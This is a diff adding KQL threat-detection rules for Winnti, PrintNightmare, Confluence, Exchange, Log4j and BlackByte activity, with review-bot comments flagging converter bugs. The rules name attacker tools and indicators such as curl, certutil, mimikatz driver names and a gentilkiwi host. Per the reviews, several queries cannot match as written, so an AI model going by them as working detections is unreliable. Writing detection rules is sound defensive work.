@@ -0,0 +1,12 @@ +// Title: Winnti Malware HK University Campaign +// Author: Florian Roth (Nextron Systems), Markus Neis +// Date: 2020-02-01 +// Level: critical +// Description: Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.g0044, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where (FolderPath startswith "C:\\ProgramData\\DRM" and (InitiatingProcessFolderPath contains "C:\\Windows\\Temp" or InitiatingProcessFolderPath contains "\\hpqhvind.exe")) or (FolderPath endswith "\\wmplayer.exe" and InitiatingProcessFolderPath startswith "C:\\ProgramData\\DRM") or (FolderPath endswith "\\wmplayer.exe" and InitiatingProcessFolderPath endswith "\\Test.exe") or FolderPath =~ "C:\\ProgramData\\DRM\\CLR\\CLR.exe" or (FolderPath endswith "\\SearchFilterHost.exe" and InitiatingProcessFolderPath startswith "C:\\ProgramData\\DRM\\Windows") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2020/TA/Winnti/winnti_pipemon_characteristics.kql b/KQL/rules-emerging-threats/2020/TA/Winnti/winnti_pipemon_characteristics.kql new file mode 100644 index 00000000..51e20957 --- /dev/null +++ b/KQL/rules-emerging-threats/2020/TA/Winnti/winnti_pipemon_characteristics.kql 
@@ -0,0 +1,12 @@ +// Title: Winnti Pipemon Characteristics +// Author: Florian Roth (Nextron Systems), oscd.community +// Date: 2020-07-30 +// Level: critical +// Description: Detects specific process characteristics of Winnti Pipemon malware reported by ESET +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001, attack.g0044, detection.emerging-threats +// False Positives: +// - Legitimate setups that use similar flags + +DeviceProcessEvents +| where ProcessCommandLine contains "setup0.exe -p" or (ProcessCommandLine contains "setup.exe" and (ProcessCommandLine endswith "-x:0" or ProcessCommandLine endswith "-x:1" or ProcessCommandLine endswith "-x:2")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/cve_2021_1675_print_spooler_exploitation_filename_pattern.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/cve_2021_1675_print_spooler_exploitation_filename_pattern.kql new file mode 100644 index 00000000..5a41e6a4 --- /dev/null +++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/cve_2021_1675_print_spooler_exploitation_filename_pattern.kql @@ -0,0 +1,10 @@ +// Title: CVE-2021-1675 Print Spooler Exploitation Filename Pattern +// Author: Florian Roth (Nextron Systems) +// Date: 2021-06-29 +// Level: critical +// Description: Detects the default filename used in PoC code against print spooler vulnerability CVE-2021-1675 +// MITRE Tactic: Execution +// Tags: attack.execution, attack.privilege-escalation, attack.resource-development, attack.t1587, cve.2021-1675, detection.emerging-threats + +DeviceFileEvents +| where FolderPath contains "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\1\\123" \ No newline at end of file 
diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/potential_printnightmare_exploitation_attempt.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/potential_printnightmare_exploitation_attempt.kql new file mode 100644 index 00000000..9a97d582 --- /dev/null +++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/potential_printnightmare_exploitation_attempt.kql @@ -0,0 +1,10 @@ +// Title: Potential PrintNightmare Exploitation Attempt +// Author: Bhabesh Raj +// Date: 2021-07-01 +// Level: high +// Description: Detect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675 +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574, cve.2021-1675, detection.emerging-threats + +DeviceFileEvents +| where InitiatingProcessFolderPath endswith "\\spoolsv.exe" and FolderPath contains "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/printernightmare_mimikatz_driver_name.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/printernightmare_mimikatz_driver_name.kql new file mode 100644 index 00000000..3bbdf80f --- /dev/null +++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/printernightmare_mimikatz_driver_name.kql 
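Review bot: The header on this hunk says the rule detects DLL deletions from the spooler driver folder, yet the query matches every DeviceFileEvents row in which spoolsv.exe touches `C:\\Windows\\System32\\spool\\drivers\\x64\\3\\`, with no action or extension filter, so ordinary driver installs and updates will raise a level-high alert. Add `and ActionType == "FileDeleted" and FolderPath endswith ".dll"` to the `where` line (FileDeleted is the MDE action name for deletions). The converter appears to have dropped the Sigma `file_delete` logsource category; fixing that in the conversion script would correct the other file_delete rules in the same run.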
@@ -0,0 +1,12 @@ +// Title: PrinterNightmare Mimikatz Driver Name +// Author: Markus Neis, @markus_neis, Florian Roth +// Date: 2021-07-04 +// Level: critical +// Description: Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527 +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204, cve.2021-1675, cve.2021-34527, detection.emerging-threats +// False Positives: +// - Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely) + +DeviceRegistryEvents +| where (RegistryKey endswith "\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\QMS 810*" or RegistryKey contains "\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\mimikatz") or (RegistryKey contains "legitprinter" and RegistryKey contains "\\Control\\Print\\Environments\\Windows") or ((RegistryKey contains "\\Control\\Print\\Environments" or RegistryKey contains "\\CurrentVersion\\Print\\Printers") and (RegistryKey contains "Gentil Kiwi" or RegistryKey contains "mimikatz printer" or RegistryKey contains "Kiwi Legit Printer")) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/windows_spooler_service_suspicious_binary_load.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/windows_spooler_service_suspicious_binary_load.kql new file mode 100644 index 00000000..12d977c9 --- /dev/null +++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-1675/windows_spooler_service_suspicious_binary_load.kql 
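Review bot: `RegistryKey endswith "...\\Version-3\\QMS 810*"` keeps a literal asterisk, which KQL `endswith` does not treat as a wildcard, so the first QMS 810 alternative can never match. Change it to `RegistryKey contains "\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\QMS 810"`. A trailing Sigma wildcard being mapped to `endswith` with the `*` retained looks like a converter bug; a search of the generated tree for `*"` would show whether other rules are affected.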
@@ -0,0 +1,12 @@ +// Title: Windows Spooler Service Suspicious Binary Load +// Author: FPT.EagleEye, Thomas Patzke (improvements) +// Date: 2021-06-29 +// Level: informational +// Description: Detect DLL Load from Spooler Service backup folder. This behavior has been observed during the exploitation of the Print Spooler Vulnerability CVE-2021-1675 and CVE-2021-34527 (PrinterNightmare). +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574, cve.2021-1675, cve.2021-34527, detection.emerging-threats +// False Positives: +// - Loading of legitimate driver + +DeviceImageLoadEvents +| where (FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\3\\" or FolderPath contains "\\Windows\\System32\\spool\\drivers\\x64\\4\\") and FolderPath endswith ".dll" and InitiatingProcessFolderPath endswith "\\spoolsv.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-26084/potential_atlassian_confluence_cve_2021_26084_exploitation_attempt.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-26084/potential_atlassian_confluence_cve_2021_26084_exploitation_attempt.kql new file mode 100644 index 00000000..774e5aa8 --- /dev/null +++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-26084/potential_atlassian_confluence_cve_2021_26084_exploitation_attempt.kql 
@@ -0,0 +1,10 @@ +// Title: Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt +// Author: Bhabesh Raj +// Date: 2021-09-08 +// Level: high +// Description: Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084 +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.execution, attack.t1190, attack.t1059, cve.2021-26084, detection.emerging-threats + +DeviceProcessEvents +| where (ProcessCommandLine contains "certutil" or ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "curl" or ProcessCommandLine contains "ipconfig" or ProcessCommandLine contains "powershell" or ProcessCommandLine contains "pwsh" or ProcessCommandLine contains "regsvr32" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "whoami" or ProcessCommandLine contains "wscript") and InitiatingProcessFolderPath endswith "\\Atlassian\\Confluence\\jre\\bin\\java.exe" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-26857/potential_cve_2021_26857_exploitation_attempt.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-26857/potential_cve_2021_26857_exploitation_attempt.kql new file mode 100644 index 00000000..fa15c274 --- /dev/null +++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-26857/potential_cve_2021_26857_exploitation_attempt.kql 
@@ -0,0 +1,10 @@ +// Title: Potential CVE-2021-26857 Exploitation Attempt +// Author: Bhabesh Raj +// Date: 2021-03-03 +// Level: high +// Description: Detects possible successful exploitation for vulnerability described in CVE-2021-26857 by looking for | abnormal subprocesses spawning by Exchange Server's Unified Messaging service +// MITRE Tactic: Execution +// Tags: attack.t1203, attack.execution, cve.2021-26857, detection.emerging-threats + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\UMWorkerProcess.exe" and (not((FolderPath endswith "wermgr.exe" or FolderPath endswith "WerFault.exe"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-26858/cve_2021_26858_exchange_exploitation.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-26858/cve_2021_26858_exchange_exploitation.kql new file mode 100644 index 00000000..21bdb334 --- /dev/null +++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-26858/cve_2021_26858_exchange_exploitation.kql @@ -0,0 +1,12 @@ +// Title: CVE-2021-26858 Exchange Exploitation +// Author: Bhabesh Raj +// Date: 2021-03-03 +// Level: high +// Description: Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for +// creation of non-standard files on disk by Exchange Server’s Unified Messaging service +// which could indicate dropping web shells or other malicious content +// MITRE Tactic: Execution +// Tags: attack.t1203, attack.execution, cve.2021-26858, detection.emerging-threats + +DeviceFileEvents +| where InitiatingProcessFolderPath endswith "UMWorkerProcess.exe" and (not((FolderPath endswith "CacheCleanup.bin" or FolderPath endswith ".txt" or FolderPath endswith ".LOG" or FolderPath endswith ".cfg" or FolderPath endswith "cleanup.bin"))) \ No newline at end of file 
diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-33771/cve_2021_31979_cve_2021_33771_exploits.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-33771/cve_2021_31979_cve_2021_33771_exploits.kql new file mode 100644 index 00000000..f93775e5 --- /dev/null +++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-33771/cve_2021_31979_cve_2021_33771_exploits.kql @@ -0,0 +1,12 @@ +// Title: CVE-2021-31979 CVE-2021-33771 Exploits +// Author: Sittikorn S, frack113 +// Date: 2021-07-16 +// Level: critical +// Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.execution, attack.credential-access, attack.t1566, attack.t1203, cve.2021-33771, cve.2021-31979, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceRegistryEvents +| where (RegistryKey endswith "CLSID\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\InprocServer32\\(Default)" or RegistryKey endswith "CLSID\\{7C857801-7381-11CF-884D-00AA004B2E24}\\InProcServer32\\(Default)") and (not((RegistryValueData endswith "system32\\wbem\\wmiutils.dll" or RegistryValueData endswith "system32\\wbem\\wbemsvc.dll"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-33771/cve_2021_31979_cve_2021_33771_exploits_by_sourgum.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-33771/cve_2021_31979_cve_2021_33771_exploits_by_sourgum.kql new file mode 100644 index 00000000..712cacbd --- /dev/null +++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-33771/cve_2021_31979_cve_2021_33771_exploits_by_sourgum.kql 
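Review bot: The `(Default)` suffix in `RegistryKey endswith "...\\InprocServer32\\(Default)"` is the Sysmon convention for the default value, whereas DeviceRegistryEvents keeps RegistryKey to the key path and exposes the value name in RegistryValueName, so both CLSID alternatives probably never match. Suggest `RegistryKey endswith "\\InprocServer32"` with the default value checked via `(isempty(RegistryValueName) or RegistryValueName =~ "(Default)")`, after confirming which form MDE reports for default values. The negated RegistryValueData exclusions for wmiutils.dll and wbemsvc.dll are fine as written.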
@@ -0,0 +1,12 @@ +// Title: CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum +// Author: Sittikorn S +// Date: 2021-07-16 +// Level: critical +// Description: Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.execution, attack.credential-access, attack.t1566, attack.t1203, cve.2021-33771, cve.2021-31979, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents +| where FolderPath contains "C:\\Windows\\system32\\physmem.sys" or FolderPath contains "C:\\Windows\\System32\\IME\\IMEJP\\imjpueact.dll" or FolderPath contains "C:\\Windows\\system32\\ime\\IMETC\\IMTCPROT.DLL" or FolderPath contains "C:\\Windows\\system32\\ime\\SHARED\\imecpmeid.dll" or FolderPath contains "C:\\Windows\\system32\\config\\spp\\ServiceState\\Recovery\\pac.dat" or FolderPath contains "C:\\Windows\\system32\\config\\cy-GB\\Setup\\SKB\\InputMethod\\TupTask.dat" or FolderPath contains "C:\\Windows\\system32\\config\\config\\startwus.dat" or FolderPath contains "C:\\Windows\\system32\\ime\\SHARED\\WimBootConfigurations.ini" or FolderPath contains "C:\\Windows\\system32\\ime\\IMEJP\\WimBootConfigurations.ini" or FolderPath contains "C:\\Windows\\system32\\ime\\IMETC\\WimBootConfigurations.ini" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-35211/serv_u_exploitation_cve_2021_35211_by_dev_0322.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-35211/serv_u_exploitation_cve_2021_35211_by_dev_0322.kql new file mode 100644 index 00000000..11642822 --- /dev/null +++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-35211/serv_u_exploitation_cve_2021_35211_by_dev_0322.kql 
@@ -0,0 +1,12 @@ +// Title: Serv-U Exploitation CVE-2021-35211 by DEV-0322 +// Author: Florian Roth (Nextron Systems) +// Date: 2021-07-14 +// Level: critical +// Description: Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322 +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1136.001, cve.2021-35211, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "whoami" and ((ProcessCommandLine contains "./Client/Common/" or ProcessCommandLine contains ".\\Client\\Common\\") or ProcessCommandLine contains "C:\\Windows\\Temp\\Serv-U.bat") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-40444/potential_cve_2021_40444_exploitation_attempt.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-40444/potential_cve_2021_40444_exploitation_attempt.kql new file mode 100644 index 00000000..a6b66193 --- /dev/null +++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-40444/potential_cve_2021_40444_exploitation_attempt.kql @@ -0,0 +1,10 @@ +// Title: Potential CVE-2021-40444 Exploitation Attempt +// Author: Florian Roth (Nextron Systems), @neonprimetime +// Date: 2021-09-08 +// Level: high +// Description: Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, cve.2021-40444, detection.emerging-threats + +DeviceProcessEvents +| where (FolderPath endswith "\\control.exe" and (InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\excel.exe")) and (not((ProcessCommandLine endswith "\\control.exe input.dll" or ProcessCommandLine endswith "\\control.exe\" input.dll"))) \ No newline at end of file 
diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-40444/potential_exploitation_attempt_from_office_application.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-40444/potential_exploitation_attempt_from_office_application.kql new file mode 100644 index 00000000..a1bc3e71 --- /dev/null +++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-40444/potential_exploitation_attempt_from_office_application.kql @@ -0,0 +1,10 @@ +// Title: Potential Exploitation Attempt From Office Application +// Author: Christian Burkard (Nextron Systems), @SBousseaden (idea) +// Date: 2022-06-02 +// Level: high +// Description: Detects Office applications executing a child process that includes directory traversal patterns. This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE) +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, cve.2021-40444, detection.emerging-threats + +DeviceProcessEvents +| where (ProcessCommandLine contains "../../../.." or ProcessCommandLine contains "..\\..\\..\\.." or ProcessCommandLine contains "..//..//..//..") and (InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\msaccess.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\eqnedt32.exe" or InitiatingProcessFolderPath endswith "\\visio.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-40444/suspicious_word_cab_file_write_cve_2021_40444.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-40444/suspicious_word_cab_file_write_cve_2021_40444.kql new file mode 100644 index 00000000..18b31d5f --- /dev/null +++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-40444/suspicious_word_cab_file_write_cve_2021_40444.kql 
@@ -0,0 +1,10 @@ +// Title: Suspicious Word Cab File Write CVE-2021-40444 +// Author: Florian Roth (Nextron Systems), Sittikorn S +// Date: 2021-09-10 +// Level: high +// Description: Detects file creation patterns noticeable during the exploitation of CVE-2021-40444 +// MITRE Tactic: Resource Development +// Tags: attack.resource-development, attack.t1587, detection.emerging-threats + +DeviceFileEvents +| where ((InitiatingProcessFolderPath endswith "\\winword.exe" and FolderPath contains "\\Windows\\INetCache" and FolderPath endswith ".cab") or (InitiatingProcessFolderPath endswith "\\winword.exe" and (FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath contains ".inf"))) and (not((FolderPath contains "AppData\\Local\\Temp" and FolderPath endswith "\\Content.inf" and FolderPath startswith "C:\\Users\\"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-41379/installerfiletakeover_lpe_cve_2021_41379_file_create_event.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-41379/installerfiletakeover_lpe_cve_2021_41379_file_create_event.kql new file mode 100644 index 00000000..494481e5 --- /dev/null +++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-41379/installerfiletakeover_lpe_cve_2021_41379_file_create_event.kql 
@@ -0,0 +1,12 @@ +// Title: InstallerFileTakeOver LPE CVE-2021-41379 File Create Event +// Author: Florian Roth (Nextron Systems) +// Date: 2021-11-22 +// Level: critical +// Description: Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1068, detection.emerging-threats +// False Positives: +// - Possibly some Microsoft Edge upgrades + +DeviceFileEvents +| where InitiatingProcessFolderPath endswith "\\msiexec.exe" and FolderPath endswith "\\elevation_service.exe" and FolderPath startswith "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-41379/potential_cve_2021_41379_exploitation_attempt.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-41379/potential_cve_2021_41379_exploitation_attempt.kql new file mode 100644 index 00000000..f9fc009f --- /dev/null +++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-41379/potential_cve_2021_41379_exploitation_attempt.kql 
@@ -0,0 +1,10 @@ +// Title: Potential CVE-2021-41379 Exploitation Attempt +// Author: Florian Roth (Nextron Systems) +// Date: 2021-11-22 +// Level: critical +// Description: Detects potential exploitation attempts of CVE-2021-41379 (InstallerFileTakeOver), a local privilege escalation (LPE) vulnerability where the attacker spawns a "cmd.exe" process as a child of Microsoft Edge elevation service "elevation_service" with "LOCAL_SYSTEM" rights +// MITRE Tactic: Privilege Escalation +// Tags: attack.privilege-escalation, attack.t1068, cve.2021-41379, detection.emerging-threats + +DeviceProcessEvents +| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "PowerShell.EXE", "pwsh.dll"))) and ((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and InitiatingProcessFolderPath endswith "\\elevation_service.exe") \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-44077/cve_2021_44077_poc_default_dropped_file.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-44077/cve_2021_44077_poc_default_dropped_file.kql new file mode 100644 index 00000000..3fd6bd5a --- /dev/null +++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-44077/cve_2021_44077_poc_default_dropped_file.kql @@ -0,0 +1,12 @@ +// Title: CVE-2021-44077 POC Default Dropped File +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-06-06 +// Level: high +// Description: Detects the creation of "msiexec.exe" in the "bin" directory of the ManageEngine SupportCenter Plus (Related to CVE-2021-44077) and public POC available (See references section) +// MITRE Tactic: Execution +// Tags: attack.execution, cve.2021-44077, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceFileEvents +| where FolderPath endswith "\\ManageEngine\\SupportCenterPlus\\bin\\msiexec.exe" \ No newline at end of file 
diff --git a/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-44228/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-44228/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql new file mode 100644 index 00000000..583e70d8 --- /dev/null +++ b/KQL/rules-emerging-threats/2021/Exploits/CVE-2021-44228/potential_cve_2021_44228_exploitation_attempt_vmware_horizon.kql @@ -0,0 +1,12 @@ +// Title: Potential CVE-2021-44228 Exploitation Attempt - VMware Horizon +// Author: @kostastsale +// Date: 2022-01-14 +// Level: high +// Description: Detects potential initial exploitation attempts against VMware Horizon deployments running a vulnerable versions of Log4j. +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1190, cve.2021-44228, detection.emerging-threats +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where InitiatingProcessFolderPath endswith "\\ws_TomcatService.exe" and (not((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe"))) \ No newline at end of file diff --git a/KQL/rules-emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/suspicious_razerinstaller_explorer_subprocess.kql b/KQL/rules-emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/suspicious_razerinstaller_explorer_subprocess.kql new file mode 100644 index 00000000..84638fb0 --- /dev/null +++ b/KQL/rules-emerging-threats/2021/Exploits/RazerInstaller-LPE-Exploit/suspicious_razerinstaller_explorer_subprocess.kql 
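Review bot: The `not(FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe")` filter on the `where` line excludes exactly the child processes most often spawned after a Log4Shell callback, which contradicts the description and means every other child of ws_TomcatService.exe, including routine Tomcat helpers, alerts at level high. If the upstream Sigma rule lists the shells as the selection rather than as a filter, the converter has inverted the condition; if the upstream filter names a different image, the list has been substituted. Verify against the source rule; for the former case the line should read `| where InitiatingProcessFolderPath endswith "\\ws_TomcatService.exe" and (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\powershell.exe")`.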
@@ -0,0 +1,12 @@
+// Title: Suspicious RazerInstaller Explorer Subprocess
+// Author: Florian Roth (Nextron Systems), Maxime Thiebaut
+// Date: 2021-08-23
+// Level: high
+// Description: Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1553, detection.emerging-threats
+// False Positives:
+// - User selecting a different installation folder (check for other sub processes of this explorer.exe process)
+
+DeviceProcessEvents
+| where ((ProcessIntegrityLevel in~ ("System", "S-1-16-16384")) and InitiatingProcessFolderPath endswith "\\RazerInstaller.exe") and (not(FolderPath startswith "C:\\Windows\\Installer\\Razer\\Installer\\"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Exploits/SystemNightmare-Exploit/potential_systemnightmare_exploitation_attempt.kql b/KQL/rules-emerging-threats/2021/Exploits/SystemNightmare-Exploit/potential_systemnightmare_exploitation_attempt.kql
new file mode 100644
index 00000000..34e1b597
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Exploits/SystemNightmare-Exploit/potential_systemnightmare_exploitation_attempt.kql
@@ -0,0 +1,10 @@
+// Title: Potential SystemNightmare Exploitation Attempt
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-08-11
+// Level: critical
+// Description: Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.t1068, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "printnightmare.gentilkiwi.com" or ProcessCommandLine contains " /user:gentilguest " or ProcessCommandLine contains "Kiwi Legit Printer"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/BlackByte/blackbyte_ransomware_registry.kql b/KQL/rules-emerging-threats/2021/Malware/BlackByte/blackbyte_ransomware_registry.kql
new file mode 100644
index 00000000..1e9363ef
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/BlackByte/blackbyte_ransomware_registry.kql
@@ -0,0 +1,12 @@
+// Title: Blackbyte Ransomware Registry
+// Author: frack113
+// Date: 2022-01-24
+// Level: high
+// Description: Detects specific windows registry modifications made by BlackByte ransomware variants.
+// BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption.
+// This rule triggers when any of the following registry keys are set to DWORD 1, however all three should be investigated as part of a larger BlackByte ransomware detection and response effort.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.t1112, detection.emerging-threats
+
+DeviceRegistryEvents
+| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey in~ ("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\LocalAccountTokenFilterPolicy", "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLinkedConnections", "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Control\\FileSystem\\LongPathsEnabled"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2021/Malware/BlackByte/potential_blackbyte_ransomware_activity.kql b/KQL/rules-emerging-threats/2021/Malware/BlackByte/potential_blackbyte_ransomware_activity.kql
new file mode 100644
index 00000000..6d1167ef
--- /dev/null
+++ b/KQL/rules-emerging-threats/2021/Malware/BlackByte/potential_blackbyte_ransomware_activity.kql
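Review bot: The `where` clause on the last `+` line of the BlackByte registry hunk is written against Sysmon field formats and, as far as I can tell, cannot match `DeviceRegistryEvents`: `RegistryValueData =~ "DWORD (0x00000001)"` is the Sysmon `Details` rendering, whereas Advanced Hunting stores the raw value (a DWORD of 1 appears as `"1"`, with the type in `RegistryValueType`), and `RegistryKey in~ (...)` compares the key path against strings that end in the value name, which MDE keeps in `RegistryValueName`. `CurrentControlSet001` in the third path also looks like a typo for `CurrentControlSet` (or `ControlSet001`) and should be checked against the upstream rule. Since this is generated output the fix belongs in the converter's registry mapping, but the clause this rule needs is roughly the following:

```kql
// … unchanged: header comments …
DeviceRegistryEvents
| where ActionType == "RegistryValueSet" and RegistryValueData == "1"
    and (
        (RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"
         and RegistryValueName in~ ("LocalAccountTokenFilterPolicy", "EnableLinkedConnections"))
        or (RegistryKey endswith "\\Control\\FileSystem" and RegistryValueName =~ "LongPathsEnabled")
    )
```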
@@ -0,0 +1,10 @@
+// Title: Potential BlackByte Ransomware Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-25
+// Level: high
+// Description: Detects command line patterns used by BlackByte ransomware in different operations
+// MITRE Tactic: Execution
